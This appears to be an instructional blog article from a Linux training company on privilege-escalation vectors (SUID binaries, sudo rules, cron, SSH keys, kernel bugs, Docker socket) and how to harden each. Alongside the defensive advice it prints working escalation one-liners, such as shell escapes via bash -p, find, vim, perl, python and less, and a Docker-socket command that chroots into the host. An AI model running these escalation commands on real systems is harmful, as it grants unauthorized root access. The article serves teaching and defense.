Information Security 23 min read
Master Linux Privilege Escalation: Risks, Exploits, and Hardening Guide
This comprehensive guide explains the most common Linux privilege‑escalation vectors—including unsafe SUID binaries, sudo misconfigurations, cron jobs, password and SSH‑key leaks, kernel vulnerabilities, container escapes, and file‑permission flaws—while providing concrete detection commands and practical hardening steps for each risk.
MaGe Linux Operations
MaGe Linux Operations
1 SUID Program Escalation
1.1 SUID Mechanism
SUID (Set User ID) marks an executable so that it runs with the file owner’s privileges, typically root, allowing any user who executes it to inherit those privileges.
find / -perm -4000 -type f 2>/dev/null1.2 Dangerous SUID Programs
# nmap (old versions can execute arbitrary commands)
find / -perm -4000 -type f -name "nmap" 2>/dev/null
# bash (if SUID is set, provides a root shell)
find / -perm -4000 -type f -name "bash" 2>/dev/null
# python/perl/ruby interpreters with SUID
find / -perm -4000 \( -name "python*" -o -name "perl*" -o -name "ruby*" \) 2>/dev/null
# find (‑exec can run arbitrary commands)
find / -perm -4000 -type f -name "find" 2>/dev/null
# vim/vi/nano (can read/modify any file)
find / -perm -4000 -type f \( -name "vim" -o -name "vi" -o -name "nano" \) 2>/dev/null1.3 SUID Exploitation Examples
# bash SUID escalation
bash -p
# nmap interactive mode (old versions)
nmap --interactive
!sh
# find command escalation
find . -exec /bin/sh -p \; -quit
# vim escalation
vim -c ':!/bin/sh'
# perl escalation
perl -e 'exec "/bin/sh";'
# python escalation
python -c 'import os; os.system("/bin/sh")'1.4 SUID Hardening
Principle: minimise the number of SUID binaries, regularly audit new SUID files, and remove unnecessary SUID bits.
# List all SUID programs for review
find / -perm -4000 -type f 2>/dev/null > /tmp/suid_files.txt
cat /tmp/suid_files.txt
# Remove unnecessary SUID bits
chmod u-s /usr/bin/nmap
chmod u-s /usr/bin/bash
# Keep only essential SUID binaries (e.g., passwd, su, sudo, pkexec, crontab, at, gpasswd, mount, umount)2 Sudo Misconfiguration Escalation
2.1 sudo Permission Errors
# Show current user sudo rights
sudo -l
# Show all sudoers entries (requires root)
cat /etc/sudoers
cat /etc/sudoers.d/*
# Common dangerous sudo entries
username ALL=(ALL) ALL # unrestricted
username ALL=(root) /bin/bash # any shell as root
username ALL=(ALL) NOPASSWD: ALL # password‑less sudo2.2 Exploiting sudo
# Use sudo‑allowed vim to spawn a root shell
sudo vim
:!/bin/sh
# Use sudo‑allowed less to execute a shell
sudo less /etc/passwd
!sh
# Use sudo‑allowed find with -exec
sudo find . -exec /bin/sh -p \; -quit
# Use sudo‑allowed wget to overwrite critical files
sudo wget -F /etc/shadow
# Use sudo‑allowed python
sudo python -c 'import os; os.system("/bin/sh")'2.3 sudo Hardening
# Minimal‑privilege sudoers example
username ALL=(root) /usr/bin/systemctl restart nginx, /usr/bin/systemctl restart php-fpm
# Disallow dangerous commands
username ALL=(root) ALL, !/bin/bash, !/usr/bin/vim, !/usr/bin/less
# Use sudoers.d for modular rules
# Log all sudo activity
Defaults logfile="/var/log/sudo.log"3 Cron Job Escalation
3.1 Cron Configuration Errors
# List system cron directories
ls -la /etc/cron.d/
ls -la /etc/cron.daily/
ls -la /etc/cron.hourly/
cat /etc/crontab
# List current user crontab
crontab -l
# List another user’s crontab (root required)
crontab -u username -l3.2 Cron Escalation Risks
Risk 1: Scripts executed by cron may be writable by ordinary users, allowing them to modify the script and gain root execution.
# Check script permissions
ls -la /etc/cron.daily/mybackup.shRisk 2: Cron entries that use relative paths can be hijacked.
# Insecure cron entry
@hourly /home/user/backup.sh
# Secure cron entry using absolute path
@hourly /usr/local/bin/backup.shRisk 3: Insecure PATH or other environment variables inherited by cron.
# View cron environment
cat /etc/pam.d/cron3.3 Cron Hardening
# Secure script permissions
chmod 755 /etc/cron.daily/myscript.sh
chown root:root /etc/cron.daily/myscript.sh
# Use absolute paths in crontab
*/5 * * * * /usr/local/bin/check_service.sh
# Restrict environment variables
CRON_TZ=UTC
PATH=/usr/bin:/bin
# Log cron activity
cron.* /var/log/cron.log
systemctl restart rsyslog4 Password and SSH‑Key Escalation
4.1 Password Hash Extraction
# Check /etc/shadow permissions
ls -la /etc/shadow
# If readable by non‑root, it is a severe issue
grep shadow /etc/group
# Find any shadow files with world‑read permission
find / -perm -004 -name "shadow" 2>/dev/null4.2 SSH Key Escalation
# Locate private keys
find / -name "*.pem" -o -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" 2>/dev/null
# Verify key permissions (should be 600)
ls -la ~/.ssh/id_rsa
# Find keys with overly permissive mode
find /home -name "*.pem" -perm 0777 2>/dev/null4.3 Password Hardening
# Strong password policy (pam_pwquality)
password requisite pam_pwquality.so retry=3 minlen=12 dcredit=-1 ucredit=-1 lcredit=-1 ocredit=-1
# Remember last 5 passwords
password sufficient pam_unix.so sha512 shadow nullok try_first_pass use_authtok remember=5
# Expiration settings (in /etc/login.defs)
PASS_MAX_DAYS 90
PASS_MIN_DAYS 7
PASS_WARN_DAYS 14
# Apply to a specific user
chage -M 90 -m 7 -W 14 username5 Kernel and Software Vulnerability Escalation
5.1 Kernel Vulnerabilities
Notable exploits such as Dirty COW (CVE‑2016‑5195) and Spectre/Meltdown allow unprivileged users to gain root.
# Show kernel version
uname -a
cat /proc/version
# Use linux‑exploit‑suggester to find known kernel bugs
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
# Alternative tool
wget https://raw.githubusercontent.com/InteliSecure/Linux_Exploit_Suggester/master/les.pl
perl les.pl5.2 Software Vulnerabilities (sudo, OpenSSL, etc.)
# Check sudo version for known CVEs
sudo -V | head -3
# Check versions of common services
openssl version
nginx -v
apache2 -v
mysql --version
php -v
# List security‑related package updates
apt list --upgradable 2>/dev/null | grep -i security
yum updateinfo list security 2>/dev/null5.3 Security Update Process
# Debian/Ubuntu
apt update
apt list --upgradable
apt-get upgrade
apt-get dist-upgrade # includes kernel updates
# RHEL/CentOS
yum check-update
yum update
yum update --security # install only security patches
# Automate with unattended‑upgrades
apt-get install unattended-upgrades
dpkg-reconfigure unattended-upgrades6 Container Escape Escalation
6.1 Docker Container Risks
# Detect if running inside a container
cat /proc/1/cgroup | grep -i docker
ls /.dockerenv 2>/dev/null
# Check if Docker socket is mounted inside the container
ls -la /var/run/docker.sock 2>/dev/null6.2 Container Escape Techniques
# If Docker socket is accessible, run a privileged container that chroots into the host
docker -H unix:///var/run/docker.sock run -v /:/host ubuntu chroot /host bash6.3 Container Hardening
# Do not mount the Docker socket into containers
# In Kubernetes, use a secure securityContext
securityContext:
privileged: false
readOnlyRootFilesystem: true
# Run containers with minimal capabilities
docker run --rm --cap-drop ALL --read-only nginx
# Avoid --privileged flag
docker run --privileged nginx # <-- dangerous
# Apply AppArmor or SELinux profiles
apparmor=unconfined
selinux enabled
# Keep base images up‑to‑date
docker pull ubuntu:22.047 File‑Permission Escalation
7.1 NFS and Shared Files
# Inspect NFS exports
cat /etc/exports
showmount -e localhost
# List NFS mounts
mount | grep nfs
# Look for writable exports with no_root_squash
# (Such exports allow client‑side root to act as host root)7.2 Sensitive File Permissions
# Verify critical system files
ls -la /etc/passwd /etc/shadow /etc/group /etc/gshadow
chmod 644 /etc/passwd
chmod 600 /etc/shadow
chown root:shadow /etc/shadow
chmod 440 /etc/sudoers
chown root:root /etc/sudoers
# Find writable cron files
find /etc/cron.d -type f -perm -002 2>/dev/null7.3 Cron Directory Permissions
# Cron directories should be owned by root and not writable by others
ls -la /etc/cron.d/
# Restrict deny files
chmod 600 /etc/cron.deny /etc/at.deny8 General Defense Strategies
8.1 Principle of Least Privilege
# Review users and groups
cat /etc/passwd
cat /etc/group
# Remove unnecessary accounts and groups
userdel username
groupdel groupname
# Audit sudo rights
visudo8.2 Regular Security Audits
# Run Lynis audit
apt-get install lynis
lynis audit system
# Check for rootkits
apt-get install chkrootkit
chkrootkit
apt-get install rkhunter
rkhunter --check8.3 File Integrity Monitoring
# Install and run AIDE
apt-get install aide
aideinit
aide --check
# Schedule daily AIDE checks via cron
#!/bin/bash
/usr/bin/aide --check8.4 Intrusion Detection
# Deploy OSSEC or similar HIDS
# Use auditd to watch critical files
auditctl -w /etc/passwd -p wa -k passwd_changes
auditctl -w /etc/shadow -p wa -k shadow_changes
auditctl -w /etc/sudoers -p wa -k sudoers_changes
auditctl -w /usr/bin -p x -k execution
# Query audit logs
ausearch -k passwd_changes | tail -209 Quick Privilege‑Escalation Check Script
#!/bin/bash
# privilege_escalation_check.sh – Linux Privilege Escalation Quick Scan
echo "=== Linux Privilege Escalation Check ==="
echo "[1] SUID Programs:"
find / -perm -4000 -type f 2>/dev/null | head -20
echo "
[2] Current User Sudo Permissions:"
sudo -l 2>/dev/null
echo "
[3] Cron Tasks:"
ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ 2>/dev/null | grep -v "^total"
echo "
[4] /etc/passwd Writable:"
ls -la /etc/passwd
if [ -w /etc/passwd ]; then echo "WARNING: /etc/passwd is world‑writable!"; fi
echo "
[5] /etc/shadow Permissions:"
ls -la /etc/shadow
if [ -r /etc/shadow ]; then echo "NOTE: /etc/shadow is readable by all"; fi
echo "
[6] Docker Socket:"
ls -la /var/run/docker.sock 2>/dev/null || echo "Docker socket not found"
echo "
[7] Kernel Version:"
uname -a
echo "
[8] Writable /etc files:"
find /etc -type f -perm -002 2>/dev/null | head -10
echo "
[9] SSH Keys:"
find /home -name "*.pem" -o -name "id_*" 2>/dev/null | xargs ls -la 2>/dev/null
echo "
[10] Running Services:"
systemctl list-units --type=service --state=running | head -20
echo "
=== Check Complete ==="10 Conclusion
Privilege escalation is a critical component of Linux operational security. Understanding common escalation paths—SUID binaries, sudo misconfigurations, insecure cron jobs, password and SSH‑key exposure, kernel and software bugs, container escapes, and file‑permission errors—and applying layered hardening measures such as least‑privilege policies, continuous monitoring, and regular audits are essential for every operations engineer.
Linux Privilege Escalation – PayloadsAllTheThings
GTFOBins – https://gtfobins.github.io/
man chmod, man chown, man visudo
CIS Benchmarks for Linux
NSA/CISA Linux Hardening Guide
Written by
MaGe Linux Operations
Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
0 followers
Reader feedback
How this landed with the community
Rate this article
Was this worth your time?
Discussion
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.